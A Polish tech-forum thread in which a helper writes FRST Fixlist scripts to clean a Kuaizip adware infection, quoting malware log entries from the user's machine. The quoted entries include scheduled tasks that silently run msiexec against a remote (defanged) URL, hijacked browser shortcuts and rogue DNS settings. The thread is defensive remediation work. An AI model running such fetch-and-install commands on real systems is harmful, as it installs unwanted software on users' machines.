Elektroda.pl
Elektroda.pl
X
CControls
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

- Kuaizip Malware Problem Potrzebny Skrypt do FRST

Htpp 07 Lut 2017 00:19 735 5
  • #1 07 Lut 2017 00:19
    Htpp
    Poziom 5  

    Witam.Ściągnąłem jakiś badziewny plik, po otwarciu pliku zaczęło mi instalować jakiś chiński program Kuaizip, który instaluje jakieś badziewne programy i w ógóle spowalnia prace komputera.Na dysku c/program files utworzył się folder o nazwie żěŃą, którego nie mogę usunąć( Nie mozna usunac poniewaz folder lub plik otwarty jest w innym programie) Probowalem roznych programow do malware itp. min. Kaspersky Removal Tool, CCleaner,adwcleaner, coś wyszukiwały i usuwały lecz ciągle to samo.Za każdym razem gdy np. odpale adwcleanera to cos wykrywa. Nie wiem jak sie tego dziadostwa pozbyć, jakieś pomysły? Jeszcze drugie pytanko: Jakiego wirusa polecacie na Core 2 Duo 2.2 GHz, 2GB RAM, żeby nie spowalniał kompa?

    0 5
  • CControls
  • #2 07 Lut 2017 00:20
    Kolobos
    Spec od komputerów

    Zamiesc wymagane logi, a na przyszlosc czytaj podwieszone watki oraz inne watki w dziale w ktorym piszesz!

    0
  • CControls
  • #3 07 Lut 2017 00:37
    Htpp
    Poziom 5  

    Kolobos napisał:
    Zamiesc wymagane logi, a na przyszlosc czytaj podwieszone watki oraz inne watki w dziale w ktorym piszesz!


    Poprawione, dodałem logi z FRST

    0
  • Pomocny post
    #4 07 Lut 2017 00:59
    Kolobos
    Spec od komputerów

    Zainfekowales system uruchamiajac zawartosc C:\Users\Buli\Downloads\office 2016.zip? Usun ten plik.

    Odinstaluj: amuleC

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    Traffic Exchange (x32 Version: 2.0.0 - Microleaves) Hidden <==== UWAGA

    W FRST wybierz Napraw.

    Po wykonaniu odinstaluj Traffic Exchange.

    W ustawieniach Chrome usun przywracanie zestawu stron po starcie przegladarki.

    Utworz kolejny Fixlist.txt:
    Task: {11871EF7-0952-4983-BB60-17D7369F34BD} - System32\Tasks\Zazshzerfertain => /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel....00418AS_9VMKDFJSXXXX9VMKDFJS&amp;v=201724 /q
    Task: {2081EF89-604F-4305-B931-316263B82A1B} - System32\Tasks\Traffic Exchange v2 - 1 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
    Task: {274410E0-2584-4BD8-9C89-5FD746E4091A} - System32\Tasks\Cherperksterrot Engine => C:\Program Files (x86)\Cizeck\plubapy.exe [2017-02-04] (Glarysoft Ltd)
    Task: {45C8EE02-693D-4FAC-BB72-E5A2EA4F79DC} - System32\Tasks\Traffic Exchange v2 - 3 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
    Task: {613DAB15-BBCC-47F1-BACD-7C4E4EB8A360} - System32\Tasks\Traffic Exchange v2 - 2 => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
    Task: C:\Windows\Tasks\Traffic Exchange v2 - 1.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
    Task: C:\Windows\Tasks\Traffic Exchange v2 - 2.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
    Task: C:\Windows\Tasks\Traffic Exchange v2 - 3.job => C:\Program Files (x86)\Microleaves\Traffic Exchange\OnlineGuardian-v2.exe <==== UWAGA
    2017-02-04 19:53 - 2017-02-04 19:53 - 00524696 _____ () C:\Program Files\żěŃą\X64\KZipShell.dll
    2017-02-06 11:02 - 2017-02-06 09:33 - 00116736 _____ () c:\program files (x86)\gub\gubzl.dll
    2017-02-04 19:54 - 2017-02-04 19:54 - 00149504 _____ () c:\program files (x86)\cizeck\terqutcmm.dll
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\37962243.sys => ""="Driver"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\37962243.sys => ""="Driver"
    HKU\S-1-5-18\...\Run: [] => 0
    HKLM\...\Providers\k0agg4el: C:\Program Files (x86)\Cherperksterrot Engine\local64spl.dll
    ShellExecuteHooks: Brak nazwy - {8DA1928A-DE4A-11E6-BFAC-64006A5CFC23} - -> Brak pliku
    ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\żěŃą\X64\KZipShell.dll [2017-02-04] ()
    CHR StartupUrls: Profile 1 -> "hxxp://otomoto.pl/osobowe","hxxp://www.motogratka.pl/","hxxp://www.olx.pl/","hxxp://www.ogloszenia.cmg24.pl/index.php?kat=21&d=1","hxxp://allegro.pl/","hxxp://www.amisites.com/?type=hp&ts=1486375381&z=193c77b4e0278d15e42a966gezabfq3c6maw4c8b9g&from=che0812&uid=ST3500418AS_9VMKDFJSXXXX9VMKDFJS"




    CHR DefaultSearchURL: Profile 1 -> hxxp://www.amisites.com/search/?type=ds&t...p;uid=ST3500418AS_9VMKDFJSXXXX9VMKDFJS&q={searchTerms}
    CHR DefaultSearchKeyword: Profile 1 -> amisites
    CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    R2 GubZL; C:\Program Files (x86)\Gub\GubZL.dll [116736 2017-02-06] () [Brak podpisu cyfrowego]
    R2 Ralerly; C:\Program Files (x86)\Cizeck\TerqutCmm.dll [149504 2017-02-04] () [Brak podpisu cyfrowego]
    2017-02-06 21:51 - 2017-02-06 22:54 - 00000000 ____D C:\Program Files\WiperSoft
    2017-02-06 21:48 - 2017-02-06 21:49 - 01944616 _____ (WiperSoft) C:\Users\Buli\Downloads\WiperSoft-installer.exe
    2017-02-06 11:02 - 2017-02-06 11:02 - 00000000 ____D C:\Program Files (x86)\Gub
    2017-02-06 11:02 - 2017-02-06 11:02 - 00000000 ____D C:\Program Files (x86)\amuleCe
    2017-02-05 09:57 - 2017-02-05 09:57 - 00000000 ____D C:\Program Files (x86)\k0agg4el
    2017-02-04 22:52 - 2017-02-04 22:52 - 00000000 _____ C:\autoexec.bat
    2017-02-04 22:20 - 2017-02-04 22:20 - 03516080 _____ (Enigma Software Group USA, LLC.) C:\Users\Buli\Downloads\SpyHunter-Installer.exe
    2017-02-04 20:12 - 2017-02-06 23:01 - 00000000 ____D C:\AdwCleaner
    2017-02-04 19:55 - 2017-02-04 19:55 - 00003672 _____ C:\Windows\System32\Tasks\Zazshzerfertain
    2017-02-04 19:55 - 2017-02-04 19:55 - 00000000 ____D C:\ProgramData\Avira
    2017-02-04 19:55 - 2017-02-04 19:55 - 00000000 ____D C:\ProgramData\Avg
    2017-02-04 19:55 - 2017-02-04 19:55 - 00000000 ____D C:\ProgramData\AVAST Software
    2017-02-04 19:54 - 2017-02-05 14:25 - 00000000 ____D C:\Program Files (x86)\Cizeck
    2017-02-04 19:54 - 2017-02-05 14:25 - 00000000 ____D C:\Program Files (x86)\Cherperksterrot Engine
    2017-02-04 19:54 - 2017-02-04 20:28 - 00000000 ____D C:\Users\Buli\AppData\Roaming\Ckeose
    2017-02-04 19:54 - 2017-02-04 19:55 - 00000000 ____D C:\Users\Buli\AppData\Local\Lgicavly
    2017-02-04 19:54 - 2017-02-04 19:54 - 00005980 _____ C:\Windows\System32\Tasks\Cherperksterrot Engine
    2017-02-04 19:52 - 2017-02-05 22:49 - 00000314 _____ C:\Windows\Tasks\Traffic Exchange v2 - 3.job
    2017-02-04 19:52 - 2017-02-05 22:49 - 00000314 _____ C:\Windows\Tasks\Traffic Exchange v2 - 2.job
    2017-02-04 19:52 - 2017-02-05 22:49 - 00000314 _____ C:\Windows\Tasks\Traffic Exchange v2 - 1.job
    2017-02-04 19:52 - 2017-02-05 00:04 - 00000000 ____D C:\Program Files\żěŃą
    2017-02-04 19:52 - 2017-02-04 19:55 - 00000000 ____D C:\Program Files (x86)\Maoha
    2017-02-04 19:52 - 2017-02-04 19:52 - 00003140 _____ C:\Windows\System32\Tasks\Traffic Exchange v2 - 3
    2017-02-04 19:52 - 2017-02-04 19:52 - 00003140 _____ C:\Windows\System32\Tasks\Traffic Exchange v2 - 2
    2017-02-04 19:52 - 2017-02-04 19:52 - 00003140 _____ C:\Windows\System32\Tasks\Traffic Exchange v2 - 1
    2017-02-04 19:52 - 2017-02-04 19:52 - 00000000 ____D C:\Users\Buli\AppData\Roaming\UCChannel
    2017-02-04 19:51 - 2017-02-04 19:52 - 00000000 ____D C:\Users\Default\AppData\Local\AdvinstAnalytics
    2017-02-04 19:51 - 2017-02-04 19:52 - 00000000 ____D C:\Users\Default User\AppData\Local\AdvinstAnalytics
    EmptyTemp:

    W FRST wybierz Napraw.

    Usun katalog C:\FRST i to wszystko.

    0
  • Pomocny post
    #6 19 Lut 2017 21:53
    Kolobos
    Spec od komputerów

    Zgraj zakladki z Chrome, profil utworzony przez infekcje zostanie usuniety.

    Podany Fixlist.txt wykonaj w trybie awaryjnym.

    Fixlist:
    CloseProcesses:
    Task: {05D072C6-BE50-44C8-9FBE-445EAC36E5D1} - System32\Tasks\KuaiZip_Update => C:\Program Files\żěŃą\X86\Update.exe [2017-02-19] (Shanghai Guangle Network Technology Ltd
    ) <==== UWAGA
    Task: {05D777F3-D040-45A4-9506-B63BC2770D41} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-02-15] (UCWeb Inc) <==== UWAGA
    Task: {23BA52EF-E15F-490C-8AC5-F5C1563DDC75} - System32\Tasks\RunBoosterUpdateTask => C:\Program Files\RunBooster\RunBoosterUpdateTask64.exe [2017-02-19] (SkyNET Corporation) <==== UWAGA
    Task: {3A425A2D-3B92-4DB1-BE00-2E8DD7E6D123} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe [2017-02-19] (UC Web Inc.) <==== UWAGA
    Task: {4646A6AB-8AFF-4433-917E-D6674F2F8978} - System32\Tasks\Atowerpyplowat => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel....0418AS_9VMKDFJSXXXX9VMKDFJS&amp;v=2017219 /q
    Task: {49D03185-822D-439A-8BF0-2ABAD715C75A} - System32\Tasks\GridinSoft Anti-Malware => C:\Program Files\GridinSoft Anti-Malware\gsam.exe
    Task: {64978C9C-50A6-40C9-8B85-C24D3DAFA719} - System32\Tasks\Jernercult Verfier => C:\Program Files (x86)\Naqodomvohs\phierk.exe [2017-02-19] (Glarysoft Ltd)
    Task: {DFA58248-8291-4347-A785-C49670B9A80D} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe [2017-02-15] (UCWeb Inc) <==== UWAGA
    Task: {FBBBB6FC-1C1F-444B-811F-BED50F017624} - System32\Tasks\{5283E72E-E1FB-46F0-BFFA-F06AE450C4D2} => pcalua.exe -a "C:\Program Files (x86)\Maoha\MaohaAP\Uninstall.exe"
    Task: {FE081ACD-9133-4BA2-BCB0-2A89BD11DE2E} - System32\Tasks\osTip => Chrome.exe <==== UWAGA
    Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: C:\Windows\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    WMI_ActiveScriptEventConsumer_ASEC: <===== UWAGA
    ShortcutWithArgument: C:\Users\Buli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/
    ShortcutWithArgument: C:\Users\Buli\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/
    ShortcutWithArgument: C:\Users\Buli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Buli\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
    ShortcutWithArgument: C:\Users\Buli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://qtipr.com/
    ShortcutWithArgument: C:\Users\Buli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Buli\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
    ShortcutWithArgument: C:\Users\Buli\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 1"
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Buli\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
    ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Buli\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
    2017-02-19 21:10 - 2017-02-19 21:10 - 00145408 _____ () C:\Program Files (x86)\Naqodomvohs\Reomotain.dll
    2017-02-19 21:10 - 2017-02-19 21:10 - 00524696 _____ () C:\Program Files\żěŃą\X64\KZipShell.dll
    2017-02-19 21:09 - 2017-02-19 21:09 - 01737728 _____ () C:\Windows\Temp\2B46.tmp
    2017-02-19 21:09 - 2017-02-19 21:09 - 00394240 _____ () C:\Windows\Temp\2B3F.tmp
    2017-02-19 21:09 - 2016-08-25 16:24 - 03441664 _____ () C:\Users\Buli\AppData\Local\Temp\is-I6FL5.tmp\AutoTime.exe
    2017-02-19 21:09 - 2017-02-19 21:09 - 02072064 _____ () C:\Users\Buli\AppData\Local\Temp\00004007\msiql.exe
    2017-02-19 21:11 - 2017-02-19 19:10 - 00313344 _____ () C:\Program Files (x86)\LdvipMPGX5ye Updater\LdvipMPGX5ye Updater.exe
    2017-02-19 21:11 - 2017-02-15 18:40 - 00599440 _____ () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
    2017-02-19 21:11 - 2017-02-19 21:11 - 00393728 _____ () C:\Program Files (x86)\01a67563-1e59-4f0a-87f4-972a12af4e9c1487534970\knsCF2.tmp
    2017-02-19 21:11 - 2017-02-19 21:11 - 00030208 _____ () C:\Program Files\RunBooster\WinDivert.dll
    2017-02-19 21:11 - 2017-02-15 18:40 - 02149136 _____ () C:\Program Files (x86)\UCBrowser\Application\6.0.1471.913\UCAgent.exe
    2017-02-19 21:10 - 2017-02-19 21:10 - 00219032 _____ () c:\program files\żěńą\x86\kuaizipupdatechecker.dll
    2017-02-19 21:11 - 2017-02-15 18:40 - 00508688 _____ () C:\Program Files (x86)\UCBrowser\Application\6.0.1471.913\libmp3lame.DLL
    2017-02-19 21:11 - 2017-02-15 18:40 - 01715472 _____ () C:\Program Files (x86)\UCBrowser\Application\6.0.1471.913\libglesv2.dll
    2017-02-19 21:11 - 2017-02-15 18:40 - 00087312 _____ () C:\Program Files (x86)\UCBrowser\Application\6.0.1471.913\libegl.dll
    AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [25444]
    AlternateDataStreams: C:\Windows\system32\drivers:x64 [371912]
    AlternateDataStreams: C:\Windows\system32\drivers:x86 [1214242]
    Hosts:
    () C:\Windows\Temp\2B46.tmp
    () C:\Windows\Temp\2B3F.tmp
    () C:\Users\Buli\AppData\Local\Temp\is-I6FL5.tmp\AutoTime.exe
    () C:\Users\Buli\AppData\Local\Temp\00004007\msiql.exe
    () C:\Program Files (x86)\LdvipMPGX5ye Updater\LdvipMPGX5ye Updater.exe
    () C:\Program Files (x86)\UCBrowser\Application\UCService.exe
    () C:\Program Files (x86)\01a67563-1e59-4f0a-87f4-972a12af4e9c1487534970\knsCF2.tmp
    (SkyNET Corporation) C:\Program Files\RunBooster\RunBoosterService64.exe
    (UCWeb Inc.) C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
    () C:\Program Files (x86)\UCBrowser\Application\6.0.1471.913\UCAgent.exe
    HKU\S-1-5-21-800759064-2579545316-1945446508-1000\...\Run: [msiql] => C:\Users\Buli\AppData\Local\Temp\00004007\msiql.exe [2072064 2017-02-19] () <===== UWAGA
    HKU\S-1-5-21-800759064-2579545316-1945446508-1000\...\Run: [osmsg] => C:\ProgramData\WindowsMsg\Chrome.exe [7288832 2017-02-16] ()
    ShellExecuteHooks: Brak nazwy - {19B5BEEC-F444-11E6-83B9-64006A5CFC23} - C:\Program Files (x86)\Naqodomvohs\Reomotain.dll [145408 2017-02-19] ()
    ShellIconOverlayIdentifiers: [KzShlobj] -> {AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => C:\Program Files\żěŃą\X64\KZipShell.dll [2017-02-19] ()
    Tcpip\..\Interfaces\{0D5DB575-E171-4CE3-956F-5C9F1CC53BE8}: [NameServer] 82.163.142.8,95.211.158.136
    CHR DefaultSearchURL: Profile 1 -> file://C:\\Users\\Buli\\AppData\\Local\\Temp\\23F0.html?bn=gch&ch_id=WAYSJ1H9&g=01a67563-1e59-4f0a-87f4-972a12af4e9c&p={searchTerms}
    CHR DefaultSearchKeyword: Profile 1 -> yahoo.com
    CHR Profile: C:\Users\Buli\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-19] <==== UWAGA
    C:\Users\Buli\AppData\Local\Google\Chrome\User Data\ChromeDefaultData
    S2 GoogleChromeUpService; C:\ProgramData\service.exe [1620992 2017-02-19] () [Brak podpisu cyfrowego] <==== UWAGA
    R2 KuaizipUpdateChecker; C:\Program Files\żěŃą\X86\kuaizipUpdateChecker.dll [219032 2017-02-19] ()
    R2 LdvipMPGX5ye Updater; C:\Program Files (x86)\LdvipMPGX5ye Updater\LdvipMPGX5ye Updater.exe [313344 2017-02-19] () [Brak podpisu cyfrowego]
    R2 RunBooster; C:\Program Files\RunBooster\RunBoosterService64.exe [286720 2017-02-19] (SkyNET Corporation) [Brak podpisu cyfrowego] <==== UWAGA
    R2 serverss; C:\Windows\Temp\2B3F.tmp [394240 2017-02-19] () [Brak podpisu cyfrowego]
    R2 UCBrowserSvc; C:\Program Files (x86)\UCBrowser\Application\UCService.exe [599440 2017-02-15] ()
    R2 zitiqoru; C:\Program Files (x86)\01a67563-1e59-4f0a-87f4-972a12af4e9c1487534970\knsCF2.tmp [393728 2017-02-19] () [Brak podpisu cyfrowego]
    R2 KuaiZipDrive; C:\Windows\system32\drivers\KuaiZipDrive.sys [92832 2017-02-19] (WinMount International Inc)
    U1 ucdrv; C:\Program Files (x86)\UCBrowser\Security:ucdrv-x64.sys [25444 ] (UC Web Inc.) <==== UWAGA
    R2 WinDivert1.2; C:\Windows\system32\drivers\WinDivert64.sys [37552 2017-02-19] (Basil)
    2017-02-19 21:14 - 2017-02-19 21:14 - 00003106 _____ C:\Windows\System32\Tasks\{5283E72E-E1FB-46F0-BFFA-F06AE450C4D2}
    2017-02-19 21:14 - 2017-02-19 21:14 - 00000000 ____D C:\Users\Buli\AppData\Roaming\Threrythecicult
    2017-02-19 21:12 - 2017-02-19 21:14 - 00000000 ____D C:\Users\Buli\AppData\Local\app
    2017-02-19 21:11 - 2017-02-19 21:21 - 00002552 _____ C:\Windows\System32\Tasks\UCBrowserUpdaterCore
    2017-02-19 21:11 - 2017-02-19 21:21 - 00000454 _____ C:\Windows\Tasks\UCBrowserUpdater.job
    2017-02-19 21:11 - 2017-02-19 21:21 - 00000290 _____ C:\Windows\Tasks\UCBrowserUpdaterCore.job
    2017-02-19 21:11 - 2017-02-19 21:11 - 00037552 _____ (Basil) C:\Windows\system32\Drivers\WinDivert64.sys
    2017-02-19 21:11 - 2017-02-19 21:11 - 00004272 _____ C:\Windows\System32\Tasks\RunBoosterUpdateTask
    2017-02-19 21:11 - 2017-02-19 21:11 - 00003476 _____ C:\Windows\System32\Tasks\UCBrowserSecureUpdater
    2017-02-19 21:11 - 2017-02-19 21:11 - 00003426 _____ C:\Windows\System32\Tasks\UCBrowserUpdater
    2017-02-19 21:11 - 2017-02-19 21:11 - 00002924 _____ C:\Windows\System32\Tasks\osTip
    2017-02-19 21:11 - 2017-02-19 21:11 - 00001522 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UC浏览器.lnk
    2017-02-19 21:11 - 2017-02-19 21:11 - 00000000 ____D C:\Users\Buli\AppData\Local\UCBrowser
    2017-02-19 21:11 - 2017-02-19 21:11 - 00000000 ____D C:\Users\Buli\AppData\Local\Chromium
    2017-02-19 21:11 - 2017-02-19 21:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UC浏览器
    2017-02-19 21:11 - 2017-02-19 21:11 - 00000000 ____D C:\Program Files\RunBooster
    2017-02-19 21:11 - 2017-02-19 21:11 - 00000000 ____D C:\Program Files (x86)\LdvipMPGX5ye Updater
    2017-02-19 21:10 - 2017-02-19 21:23 - 00000000 ____D C:\Users\Buli\AppData\Roaming\KuaiZip
    2017-02-19 21:10 - 2017-02-19 21:14 - 00000000 ____D C:\Program Files (x86)\Maoha
    2017-02-19 21:10 - 2017-02-19 21:11 - 00000000 __SHD C:\ProgramData\WindowsMsg
    2017-02-19 21:10 - 2017-02-19 21:11 - 00000000 ____D C:\Program Files (x86)\UCBrowser
    2017-02-19 21:10 - 2017-02-19 21:11 - 00000000 ____D C:\Program Files (x86)\Naqodomvohs
    2017-02-19 21:10 - 2017-02-19 21:10 - 00092832 _____ (WinMount International Inc) C:\Windows\system32\Drivers\KuaiZipDrive.sys
    2017-02-19 21:10 - 2017-02-19 21:10 - 00006002 _____ C:\Windows\System32\Tasks\Jernercult Verfier
    2017-02-19 21:10 - 2017-02-19 21:10 - 00003382 _____ C:\Windows\System32\Tasks\KuaiZip_Update
    2017-02-19 21:10 - 2017-02-19 21:10 - 00000837 _____ C:\Users\Buli\AppData\Roaming\Microsoft\Windows\Start Menu\żěŃą.lnk
    2017-02-19 21:10 - 2017-02-19 21:10 - 00000000 __SHD C:\Users\Buli\AppData\Local\svchost
    2017-02-19 21:10 - 2017-02-19 21:10 - 00000000 ____D C:\Users\Buli\AppData\Roaming\Softlink
    2017-02-19 21:10 - 2017-02-19 21:10 - 00000000 ____D C:\Users\Buli\AppData\Local\Bijlyirerge
    2017-02-19 21:10 - 2017-02-19 21:10 - 00000000 ____D C:\Program Files\żěŃą
    2017-02-19 21:10 - 2017-02-19 21:10 - 00000000 ____D C:\Program Files (x86)\Jernercult Verfier
    2017-02-19 21:09 - 2017-02-19 21:14 - 00000000 ____D C:\Program Files (x86)\CleanBrowser
    2017-02-19 21:09 - 2017-02-19 21:11 - 00000000 ____D C:\Program Files (x86)\01a67563-1e59-4f0a-87f4-972a12af4e9c1487534970
    2017-02-19 21:09 - 2017-02-19 21:09 - 01620992 _____ C:\ProgramData\service.exe
    2017-02-19 21:09 - 2017-02-19 21:09 - 00005064 _____ C:\Windows\System32\Tasks\Atowerpyplowat
    2017-02-19 21:09 - 2017-02-19 21:09 - 00000000 ____D C:\Users\Buli\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk
    2017-02-19 21:09 - 2017-02-19 21:09 - 00000000 _____ C:\TOSTACK
    2017-02-07 18:56 - 2017-02-07 19:09 - 00000000 ____D C:\AdwCleaner
    2017-02-07 09:26 - 2017-02-07 09:26 - 00000000 ____D C:\Users\Buli\AppData\Local\AdvinstAnalytics
    2017-02-19 21:09 - 2017-02-19 21:09 - 1620992 _____ () C:\ProgramData\service.exe
    C:\ProgramData\service.exe
    EmptyTemp:




    Zrob pelny skan przy pomocy Mbam i usun to co wykryje:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/
    oraz http://ftp.drweb.com/pub/drweb/cureit/launch.exe

    Po wszystkim zamiesc nowe logi z FRST, ze skanowania.

    0